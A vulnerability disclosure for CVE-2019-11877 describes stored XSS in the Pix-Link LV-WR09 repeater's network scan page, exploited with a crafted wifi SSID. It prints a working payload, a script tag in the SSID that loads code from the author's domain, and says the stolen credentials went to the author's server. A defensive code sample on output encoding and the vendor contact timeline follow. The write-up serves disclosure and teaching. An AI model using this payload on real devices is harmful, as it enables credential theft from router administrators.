[CVE-2019-11877] Credentials Stealing Through XSS on Pix-Link Repeater
I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”
When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.
I used my smartphone to create a wifi network named
And did the test:
Now it’s time to make a real attack.
The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:
I changed the SSID in my smartphone to <script src=//ilrg.xyz></script> and in the index.html I put my script:
Now I just need to go to the settings page of the repeater and scan for available networks.
It will run the XSS and send the data to a file on my server.
With this we have a POC!
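The root cause is that the scan page places an attacker-controlled SSID into HTML without encoding it. The sketch below is an added example, not code from the original post or from the vendor's firmware: it renders a scan list the vulnerable way and the hardened way. The function names and the scan results are constructed for illustration.

```javascript
// Constructed scan results. The second entry carries the 32-character
// script-tag SSID from the post; nothing here comes from real firmware.
const scanResults = [
  { ssid: "HomeNet", bssid: "aa:bb:cc:dd:ee:01", channel: 6 },
  { ssid: "<script src=//ilrg.xyz></script>", bssid: "aa:bb:cc:dd:ee:02", channel: 11 },
];

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const MAC_RE = /^([0-9a-f]{2}:){5}[0-9a-f]{2}$/i;

// Encode every character that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: radio-supplied fields concatenated into markup unchanged.
function renderRowUnsafe(net) {
  return `<tr><td>${net.ssid}</td><td>${net.bssid}</td><td>${net.channel}</td></tr>`;
}

// Hardened pattern: every field from the air is untrusted. The SSID is
// encoded, the BSSID must look like a MAC address, the channel must be an integer.
function renderRowSafe(net) {
  const ssid = escapeHtml(net.ssid);
  const bssid = MAC_RE.test(net.bssid) ? net.bssid : "invalid";
  const channel = Number.isInteger(net.channel) ? net.channel : "";
  return `<tr><td>${ssid}</td><td>${bssid}</td><td>${channel}</td></tr>`;
}

function renderTable(rows, renderRow) {
  return `<table>${rows.map(renderRow).join("")}</table>`;
}

// Simple check for regression tests: does the markup still contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("unsafe output has script tag:", containsScriptTag(renderTable(scanResults, renderRowUnsafe)));
console.log("safe output has script tag:  ", containsScriptTag(renderTable(scanResults, renderRowSafe)));
```

With the encoded version the network name is displayed as text in the table instead of being parsed as markup.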
Sources that served as inspiration:
28/04/2019 — First email sent to the vendor (no answer)
06/05/2019 — Second email sent to the vendor (no answer)
15/05/2019 — Third email sent to the vendor (no answer)
27/05/2019 — Disclosure